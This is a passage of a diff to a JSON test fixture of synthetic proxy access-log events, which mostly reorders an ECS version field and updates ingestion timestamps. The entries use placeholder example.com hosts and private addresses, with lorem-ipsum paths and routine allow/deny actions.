Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36\" allow", "event": { - "ingested": "2021-06-08T12:14:42.230326800Z" + "ingested": "2021-12-14T14:55:10.058081284Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.51.236.148 329 [16/Nov/2017:6:08:15 adol] \"PROPFIND https://mail.example.com/roide/tem.gif?rerepre=nculpaq#culpaqui tvolup\" 10.116.146.114 col obea \"emp\" agnaaliq est 1444 \"https://www.example.com/inculp/onofd.gif?umdolors=dolori#asperna\" \"Mozilla/5.0 (Linux; Android 10; STK-L21 Build/HUAWEISTK-L21) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36 YaApp_Android/10.91 YaSearchBrowser/10.91\" deny", "event": { - "ingested": "2021-06-08T12:14:42.230330200Z" + "ingested": "2021-12-14T14:55:10.058081648Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.244.108.135 6997 [01/Dec/2017:1:10:49 ume] \"NONE https://internal.example.net/rautod/olest.jpg?lapar=ritati#edquia itesse\" 10.217.222.99 ame amvolu \"mip\" tion tobeatae 2512 \"https://api.example.com/iqua/luptat.txt?oremqu=uradi#velitsed\" \"Mozilla/5.0 (Linux; Android 6.0; U20 Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.147 Mobile Safari/537.36 YaApp_Android/10.90 YaSearchBrowser/10.90\" block", "event": { - "ingested": "2021-06-08T12:14:42.230334Z" + "ingested": "2021-12-14T14:55:10.058082023Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.4.69.152 3833 [15/Dec/2017:8:13:24 scivel] \"PUT https://api.example.org/iusmodt/enim.txt?aquio=ersp#iame orroquis\" 10.150.198.112 ntmoll mexer \"estla\" uipexe abor 1370 \"https://www.example.net/remips/illoi.jpg?abori=uisnostr#reetdol\" \"Mozilla/5.0 (Linux; Android 10; SM-A305FN Build/QP1A.190711.020; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/78.0.3904.96 Mobile Safari/537.36 YandexSearch/8.10 YandexSearchBrowser/8.10\" block", "event": { - "ingested": "2021-06-08T12:14:42.230337700Z" + "ingested": "2021-12-14T14:55:10.058082402Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.45.114.111 357 [29/Dec/2017:3:15:58 olup] \"POST https://example.org/abillo/undeom.html?oraincid=quaer#eetdo tlab\" 10.45.54.107 seddoeiu nse \"aali\" edictasu mdolors 7490 \"https://www5.example.org/atis/atDuis.txt?nisiut=rumwri#velill\" \"Mozilla/5.0 (Linux; Android 10; SM-A715F Build/QP1A.190711.020; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/83.0.4103.83 Mobile Safari/537.36 [FB_IAB/Orca-Android;FBAV/266.0.0.16.117;]\" accept", "event": { - "ingested": "2021-06-08T12:14:42.230341300Z" + "ingested": "2021-12-14T14:55:10.058082790Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.49.242.174 4078 [12/Jan/2018:10:18:32 tat] \"TRACE https://mail.example.net/uam/orumSec.jpg?isnisiu=suntincu#sse venia\" 10.205.28.24 oeni untutlab \"tvolup\" consecte pteurs 742 \"https://www5.example.net/ons/tiaecon.html?unt=tass#tiumdol\" \"Mozilla/5.0 (Linux; Android 6.0; U20 Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.147 Mobile Safari/537.36 YaApp_Android/10.90 YaSearchBrowser/10.90\" allow", "event": { - "ingested": "2021-06-08T12:14:42.230345300Z" + "ingested": "2021-12-14T14:55:10.058083331Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.17.202.219 487 [27/Jan/2018:5:21:06 iame] \"HEAD https://www5.example.org/umiurer/rere.txt?mnisi=usmo#iamea imaveni\" 10.183.223.149 cor odoco \"oin\" itseddoe elites 6366 \"https://mail.example.com/eursinto/litesse.html?licaboNe=tautfug#giatquov\" \"Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) yahoo.adquality.lwd.desktop/1591143192-10\" deny", "event": { - "ingested": "2021-06-08T12:14:42.230350100Z" + "ingested": "2021-12-14T14:55:10.058083707Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.81.140.173 7623 [10/Feb/2018:12:23:41 itae] \"MOVE https://internal.example.net/atnula/ditautf.jpg?iquidex=olup#remipsu tan\" 10.88.172.222 doconse etdol \"dolorsi\" nturmag tura 6695 \"https://internal.example.org/totam/ntoccae.htm?idunt=atqu#naturau\" \"mobmail android 2.1.3.3150\" cancel", "event": { - "ingested": "2021-06-08T12:14:42.230354200Z" + "ingested": "2021-12-14T14:55:10.058084113Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.162.129.196 4247 [24/Feb/2018:7:26:15 snisi] \"OPTIONS https://api.example.net/uscip/umS.txt?quiacons=uisa#xeacommo Cicero\" 10.247.53.179 issu identsu \"piscivel\" hend eacommo 6835 \"https://example.com/osquira/umd.gif?scipi=tur#acon\" \"mobmail android 2.1.3.3150\" accept", "event": { - "ingested": "2021-06-08T12:14:42.230358100Z" + "ingested": "2021-12-14T14:55:10.058084483Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.110.86.230 536 [11/Mar/2018:2:28:49 eFini] \"UNLOCK https://mail.example.com/mrema/ullamc.txt?eufug=roquisq#temporai uido\" 10.172.148.223 snulap enimadm \"stenatu\" upta atc 3066 \"https://www5.example.net/asnulap/ipi.htm?orissu=fic#sBon\" \"Mozilla/5.0 (Linux; Android 5.1.1; Android Build/LMY47V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Mobile Safari/537.36 YaApp_Android/9.80 YaSearchBrowser/9.80\" accept", "event": { - "ingested": "2021-06-08T12:14:42.230361900Z" + "ingested": "2021-12-14T14:55:10.058084861Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.93.159.170 3481 [25/Mar/2018:9:31:24 emullam] \"GET https://www5.example.com/isau/itinvol.txt?saquaea=ons#orsitam modico\" 10.232.19.43 porinc riame \"riat\" sseq eriam 729 \"https://internal.example.net/imve/essequam.gif?urQuis=etcon#onsequu\" \"Mozilla/5.0 (Linux; Android 6.0; QMobile X700 PRO II) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.92 Mobile Safari/537.36\" deny", "event": { - "ingested": "2021-06-08T12:14:42.230366Z" + "ingested": "2021-12-14T14:55:10.058085229Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.207.97.192 973 [08/Apr/2018:4:33:58 emp] \"ICP_QUERY https://api.example.net/veli/venia.htm?etdolor=uat#onemulla riaturEx\" 10.55.55.72 nculp asp \"eacom\" mag gelitse 2007 \"https://example.net/lab/llumq.htm?tetura=rumet#uptasnul\" \"Mozilla/5.0 (Linux; Android 7.0; SM-S337TL) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36\" cancel", "event": { - "ingested": "2021-06-08T12:14:42.230370Z" + "ingested": "2021-12-14T14:55:10.058085755Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.41.156.88 203 [22/Apr/2018:11:36:32 oco] \"MOVE https://internal.example.net/ainci/osqu.jpg?sus=imavenia#expli ugiat\" 10.89.73.240 orem ntorever \"pisciv\" fugiatqu seos 5561 \"https://www5.example.net/elillum/veleumi.gif?tvol=oluptate#lit\" \"Mozilla/5.0 (Linux; Android 9; 5024D_RU Build/PPR1.180610.011) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.92 Mobile Safari/537.36 YaApp_Android/10.61 YaSearchBrowser/10.61\" deny", "event": { - "ingested": "2021-06-08T12:14:42.230373800Z" + "ingested": "2021-12-14T14:55:10.058086120Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.54.44.231 5292 [07/May/2018:6:39:06 aco] \"CONNECT https://www.example.org/runtm/eturadip.htm?psumd=oloree#seos rios\" 10.101.183.86 mvenia mcorpo \"ntexpl\" abor oreverit 6451 \"https://internal.example.net/tat/eufugia.htm?tau=fficia#est\" \"Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) yahoo.adquality.lwd.desktop/1591143192-10\" allow", "event": { - "ingested": "2021-06-08T12:14:42.230377300Z" + "ingested": "2021-12-14T14:55:10.058086523Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.181.177.74 3378 [21/May/2018:1:41:41 itsedd] \"LOCK https://internal.example.org/liquipex/uisnos.html?ventor=lupt#umwri odoc\" 10.130.150.189 oreeu nvo \"iamqui\" tassita colabori 1223 \"https://www.example.net/lpa/isn.htm?iat=ffic#siuta\" \"Mozilla/5.0 (Linux; Android 9; U307AS) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36\" accept", "event": { - "ingested": "2021-06-08T12:14:42.230381700Z" + "ingested": "2021-12-14T14:55:10.058086887Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.76.220.3 2492 [04/Jun/2018:8:44:15 serrorsi] \"GET https://api.example.org/mquisnos/lore.txt?siar=isn#veniamq lup\" 10.83.130.95 ipitlabo userror \"eacommo\" nderi liqua 7030 \"https://api.example.net/henderit/remq.jpg?voluptas=velill#rspic\" \"Mozilla/5.0 (Linux; Android 4.1.2; Micromax P410i Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.111 Mobile Safari/537.36\" deny", "event": { - "ingested": "2021-06-08T12:14:42.230386500Z" + "ingested": "2021-12-14T14:55:10.058087248Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.219.245.58 7073 [19/Jun/2018:3:46:49 snisiut] \"COPY https://www.example.com/quas/occaeca.htm?ender=dico#uptatem upt\" 10.166.160.217 olor radip \"rchitect\" Dui iameaqu 2429 \"https://api.example.com/asnulap/yCiceroi.jpg?ender=inc#tect\" \"Opera/9.80 (Series 60; Opera Mini/7.1.32444/174.101; U; ru) Presto/2.12.423 Version/12.16\" deny", "event": { - "ingested": "2021-06-08T12:14:42.230390400Z" + "ingested": "2021-12-14T14:55:10.058087616Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.121.121.153 723 [03/Jul/2018:10:49:23 smoditem] \"UNLOCK https://www5.example.org/uidolo/umdolore.jpg?oquisq=abori#sit catcu\" 10.183.243.246 amni tatio \"amquisno\" modoc magnam 3267 \"https://example.com/idatat/onev.html?lesti=oreseo#reprehen\" \"Mozilla/5.0 (Linux; Android 10; STK-L21 Build/HUAWEISTK-L21) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36 YaApp_Android/10.91 YaSearchBrowser/10.91\" cancel", "event": { - "ingested": "2021-06-08T12:14:42.230393900Z" + "ingested": "2021-12-14T14:55:10.058087983Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.54.5.47 1585 [17/Jul/2018:5:51:58 mmodi] \"OPTIONS https://internal.example.net/eniamqu/inimav.htm?imadm=uta#tisu remagnam\" 10.202.224.209 iusmodit aturv \"ectetura\" obeataev umf 3141 \"https://www.example.com/quaeabil/emip.htm?urExc=tDuis#iqu\" \"Mozilla/5.0 (Linux; Android 4.1.2; Micromax P410i Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.111 Mobile Safari/537.36\" cancel", "event": { - "ingested": "2021-06-08T12:14:42.230399700Z" + "ingested": "2021-12-14T14:55:10.058088344Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.72.99.69 3172 [01/Aug/2018:12:54:32 oremeumf] \"PROPFIND https://mail.example.net/sintocca/mipsumqu.htm?tnulapar=ico#giatquo lors\" 10.170.234.233 accus uatu \"mquis\" lab uido 2046 \"https://mail.example.com/tena/aal.jpg?CSedu=mcol#lup\" \"Mozilla/5.0 (Linux; Android 9; POCOPHONE F1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36\" allow", "event": { - "ingested": "2021-06-08T12:14:42.230403300Z" + "ingested": "2021-12-14T14:55:10.058088713Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.245.240.47 4017 [15/Aug/2018:7:57:06 itaedict] \"DELETE https://api.example.org/rep/remap.html?siarc=fdeFin#eleumi edic\" 10.142.130.227 olabori odic \"iuta\" liquaUte scivelit 7795 \"https://internal.example.net/scipit/lloinve.htm?evolup=rvelil#isiutali\" \"Mozilla/5.0 (Linux; Android 9; ZTE Blade V1000RU Build/PPR1.180610.011) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Mobile Safari/537.36 YaApp_Android/10.91 YaSearchBrowser/10.91\" allow", "event": { - "ingested": "2021-06-08T12:14:42.230406900Z" + "ingested": "2021-12-14T14:55:10.058089127Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.62.188.193 4104 [29/Aug/2018:2:59:40 atu] \"DELETE https://api.example.net/eturad/tDuis.htm?enimadmi=tateveli#osa mini\" 10.61.110.7 oremque quaU \"ufugi\" cin tmo 508 \"https://example.com/oremip/its.jpg?iavol=natuserr#ostrudex\" \"Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) yahoo.adquality.lwd.desktop/1591143192-10\" deny", "event": { - "ingested": "2021-06-08T12:14:42.230410300Z" + "ingested": "2021-12-14T14:55:10.058089494Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.172.139.78 6533 [12/Sep/2018:10:02:15 lamco] \"COPY https://www.example.net/hender/ptatemU.htm?mquisnos=tnulapa#madmi tlabore\" 10.68.198.188 doeiu onsectet \"dentsunt\" inea animid 2119 \"https://mail.example.net/onnumqua/quioff.html?upt=atatnonp#nvol\" \"Mozilla/5.0 (Linux; Android 9; 5024D_RU Build/PPR1.180610.011) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.92 Mobile Safari/537.36 YaApp_Android/10.61 YaSearchBrowser/10.61\" block", "event": { - "ingested": "2021-06-08T12:14:42.230413900Z" + "ingested": "2021-12-14T14:55:10.058089882Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.172.47.7 2805 [27/Sep/2018:5:04:49 midest] \"CONNECT https://www.example.org/iduntutl/rsitam.htm?ntor=oinBCSed#oid rchit\" 10.169.63.169 ariat midestl \"quatu\" avolu teturad 3465 \"https://api.example.net/iquaUten/prehende.gif?rpo=velites#nonpro\" \"Opera/9.80 (Series 60; Opera Mini/7.1.32444/174.101; U; ru) Presto/2.12.423 Version/12.16\" block", "event": { - "ingested": "2021-06-08T12:14:42.230417300Z" + "ingested": "2021-12-14T14:55:10.058090255Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.32.98.109 5012 [11/Oct/2018:12:07:23 dexercit] \"PURGE https://example.org/itessequ/porissu.html?uip=ectobea#dat aUtenima\" 10.62.10.137 eeufugi deomnisi \"olupta\" oll laboree 3880 \"https://api.example.org/cupidata/stiaecon.htm?rsint=itl#ttenb\" \"Mozilla/5.0 (Linux; Android 9; LG-US998) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36\" cancel", "event": { - "ingested": "2021-06-08T12:14:42.230421100Z" + "ingested": "2021-12-14T14:55:10.058090622Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.176.62.146 5945 [25/Oct/2018:7:09:57 lors] \"COPY https://api.example.net/enimad/tis.txt?mipsumq=ident#nimide quelaud\" 10.255.40.12 rro oeiusmo \"nimv\" emeu tatemac 5192 \"https://www5.example.com/teursint/etMa.gif?lamcolab=ceroinB#umqui\" \"Mozilla/5.0 (Linux; Android 6.0; U20 Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.147 Mobile Safari/537.36 YaApp_Android/10.90 YaSearchBrowser/10.90\" deny", "event": { - "ingested": "2021-06-08T12:14:42.230424600Z" + "ingested": "2021-12-14T14:55:10.058090999Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.194.198.46 3387 [09/Nov/2018:2:12:32 cta] \"GET https://api.example.org/taspe/yCiceroi.htm?cti=ommodoc#nse mveniam\" tuser 2694 \"https://internal.example.com/tlaboru/aeabillo.txt?equuntu=quamni#turveli\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 13_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 LightSpeed [FBAN/MessengerLiteForiOS;FBAV/266.0.0.32.114;FBBV/216059178;FBDV/iPhone10,6;FBMD/iPhone;FBSN/iOS;FBSV/13.4.1;FBSS/3;FBCR/;FBID/phone;FBLC/en_US;FBOP/0]\" deny 10.88.98.31 rured 105.243000", "event": { - "ingested": "2021-06-08T12:14:42.230427800Z" + "ingested": "2021-12-14T14:55:10.058091369Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.5.49.20 7503 [23/Nov/2018:9:15:06 macc] \"OPTIONS https://example.com/beat/rro.jpg?uisau=qua#iarchite emsequi\" 10.1.27.133 edqu tationu \"gnaaliq\" olore ntutlab 6881 \"https://www5.example.com/gnama/esciun.html?ratvo=ntutl#volupt\" \"Mozilla/5.0 (Linux; Android 6.0; Lenovo A2016a40 Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.106 Mobile Safari/537.36 YaApp_Android/10.30 YaSearchBrowser/10.30\" block", "event": { - "ingested": "2021-06-08T12:14:42.230431200Z" + "ingested": "2021-12-14T14:55:10.058091745Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.11.73.145 6972 [07/Dec/2018:4:17:40 uisautem] \"POST https://www5.example.org/loremq/turmagni.txt?emUtenim=ende#dexea aco\" 10.70.244.155 olorsi caboNemo \"uptas\" temaccus ons 2160 \"https://internal.example.com/ctetur/mvolupta.html?oreeu=mea#ssec\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 13_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 LightSpeed [FBAN/MessengerLiteForiOS;FBAV/266.0.0.32.114;FBBV/216059178;FBDV/iPhone10,6;FBMD/iPhone;FBSN/iOS;FBSV/13.4.1;FBSS/3;FBCR/;FBID/phone;FBLC/en_US;FBOP/0]\" accept", "event": { - "ingested": "2021-06-08T12:14:42.230434500Z" + "ingested": "2021-12-14T14:55:10.058092108Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.204.214.98 985 [21/Dec/2018:11:20:14 equ] \"PURGE https://www5.example.net/deomnisi/ddoe.txt?oremi=ectobeat#ecte abo\" 10.121.80.158 boriosa cillumdo \"ditau\" moenimip uames 7663 \"https://internal.example.com/lor/oreeu.html?eturadip=nost#atus\" \"Mozilla/5.0 (Linux; Android 7.0; SM-S337TL) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36\" accept", "event": { - "ingested": "2021-06-08T12:14:42.230438200Z" + "ingested": "2021-12-14T14:55:10.058092587Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.74.115.33 4006 [05/Jan/2019:6:22:49 nsequat] \"PURGE https://api.example.net/tiset/sci.jpg?rauto=doloreeu#lors eumfu\" 10.139.151.19 eumf roquisq \"uasi\" maveniam uis 5533 \"https://www.example.com/imi/animi.htm?ama=tatnonp#ntiumt\" \"Mozilla/5.0 (Linux; Android 10; SM-A305FN Build/QP1A.190711.020; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/78.0.3904.96 Mobile Safari/537.36 YandexSearch/8.10 YandexSearchBrowser/8.10\" block", "event": { - "ingested": "2021-06-08T12:14:42.230441700Z" + "ingested": "2021-12-14T14:55:10.058092950Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.191.220.1 6454 [19/Jan/2019:1:25:23 ctetura] \"DELETE https://api.example.net/tDuisau/aturve.htm?tper=pisciv#tconsect pariat\" 10.242.48.203 ctobeat isi \"idexeac\" ntu tdolo 3872 \"https://mail.example.com/olupt/ola.jpg?etquasia=qua#adm\" \"Mozilla/5.0 (Linux; Android 9; Notepad_K10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Safari/537.36\" deny", "event": { - "ingested": "2021-06-08T12:14:42.230445100Z" + "ingested": "2021-12-14T14:55:10.058093314Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.109.88.27 5568 [02/Feb/2019:8:27:57 cidu] \"PROPATCH https://internal.example.com/oluptate/todi.jpg?tdolo=ident#scip eacommod\" 10.254.10.98 adipisc aparia \"maliq\" ccusant epteurs 6661 \"https://www5.example.org/oditau/onsec.gif?temqui=lup#aeca\" \"Mozilla/5.0 (Linux; Android 9; Pixel 3 Build/PD1A.180720.030) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.158 Mobile Safari/537.36\" accept", "event": { - "ingested": "2021-06-08T12:14:42.230448400Z" + "ingested": "2021-12-14T14:55:10.058093672Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.5.148.114 4749 [17/Feb/2019:3:30:32 ntin] \"LOCK https://mail.example.com/radipis/lore.html?civeli=eufugia#utlabore tamr\" 10.175.138.42 olore onemul \"trudexe\" remeum etur 890 \"https://mail.example.org/quiav/ctionofd.gif?Finibus=uisautei#nevolu\" \"Mozilla/5.0 (Linux; Android 6.0; ZTE BLADE V7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36\" deny", "event": { - "ingested": "2021-06-08T12:14:42.230451800Z" + "ingested": "2021-12-14T14:55:10.058094039Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.0.0.240 1795 [03/Mar/2019:10:33:06 psa] \"PROPFIND https://internal.example.org/olupta/tio.jpg?idestl=litani#emp arch\" 10.18.199.203 ugits ittenb \"tobeatae\" ntut llum 366 \"https://example.com/equat/estiaec.htm?mquido=ende#ntmollit\" \"Mozilla/5.0 (Linux; Android 9; U307AS) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36\" allow", "event": { - "ingested": "2021-06-08T12:14:42.230455100Z" + "ingested": "2021-12-14T14:55:10.058094407Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.1.220.47 6685 [17/Mar/2019:5:35:40 mipsamv] \"NONE https://www5.example.com/sequines/cto.gif?temaccu=uamqua#Neq runt\" 10.73.80.251 pteurs ercitati \"atem\" serro lumquid 5939 \"https://www5.example.org/imaveni/equ.htm?ssequamn=ave#taliqui\" \"Mozilla/5.0 (Linux; Android 10; SM-A715F Build/QP1A.190711.020; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/83.0.4103.83 Mobile Safari/537.36 [FB_IAB/Orca-Android;FBAV/266.0.0.16.117;]\" allow", "event": { - "ingested": "2021-06-08T12:14:42.230458700Z" + "ingested": "2021-12-14T14:55:10.058094769Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.153.109.61 7499 [01/Apr/2019:12:38:14 numq] \"PURGE https://www.example.net/periam/ain.gif?iquipex=mqu#onorume abill\" 10.22.34.206 mini mve \"tionev\" uasiarch velites 1745 \"https://api.example.org/equa/edquiaco.gif?olorsit=naaliq#plica\" \"Mozilla/5.0 (Linux; Android 10; STK-L21 Build/HUAWEISTK-L21) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36 YaApp_Android/10.91 YaSearchBrowser/10.91\" block", "event": { - "ingested": "2021-06-08T12:14:42.230462200Z" + "ingested": "2021-12-14T14:55:10.058095180Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.62.168.226 5334 [15/Apr/2019:7:40:49 bori] \"CONNECT https://www.example.net/ecatc/quovolu.jpg?dexe=nemul#Duis lupt\" 10.199.103.185 uipe ipsa \"con\" eirured sequamn 5243 \"https://mail.example.com/ciatisun/duntutl.htm?didun=riaturEx#nde\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 13_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 LightSpeed [FBAN/MessengerLiteForiOS;FBAV/266.0.0.32.114;FBBV/216059178;FBDV/iPhone10,6;FBMD/iPhone;FBSN/iOS;FBSV/13.4.1;FBSS/3;FBCR/;FBID/phone;FBLC/en_US;FBOP/0]\" allow", "event": { - "ingested": "2021-06-08T12:14:42.230465600Z" + "ingested": "2021-12-14T14:55:10.058095536Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.97.33.56 3541 [29/Apr/2019:2:43:23 rad] \"COPY https://example.com/tqui/ssequ.gif?emse=emqui#cipitla tlab\" 10.128.84.27 nula ptate \"volupta\" umfu utla 2478 \"https://www5.example.com/dolo/velites.gif?equa=apari#tsunt\" \"Mozilla/5.0 (Linux; Android 10; ASUS_X01BDA) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.162 Mobile Safari/537.36\" block", "event": { - "ingested": "2021-06-08T12:14:42.230469400Z" + "ingested": "2021-12-14T14:55:10.058095903Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.49.169.175 2103 [13/May/2019:9:45:57 sistena] \"HEAD https://example.com/caboN/imipsam.jpg?catcupid=ritquiin#quisnost sequines\" 10.115.154.104 illum ore \"spici\" Sedut tatis 7767 \"https://www5.example.com/sequines/minimve.gif?toditau=uiad#nvolupta\" \"Mozilla/5.0 (Linux; Android 8.1.0; SM-A260G Build/OPR6; rv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Rocket/2.1.17(19420) Chrome/81.0.4044.138 Mobile Safari/537.36\" allow", "event": { - "ingested": "2021-06-08T12:14:42.230472900Z" + "ingested": "2021-12-14T14:55:10.058096280Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.213.100.153 2571 [28/May/2019:4:48:31 iatquo] \"PROPFIND https://www.example.org/oinvento/ali.htm?utaliqui=isciv#osqu ptatemse\" 10.33.112.100 catcup enimad \"magnaali\" velillum ionev 1594 \"https://internal.example.com/ameaq/Quis.html?lestiae=iav#umiure\" \"Mozilla/5.0 (Linux; U; Android 4.0.3; es-us; GT-P3100 Build/IML74K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30\" block", "event": { - "ingested": "2021-06-08T12:14:42.230476400Z" + "ingested": "2021-12-14T14:55:10.058096642Z" + }, + "ecs": { + 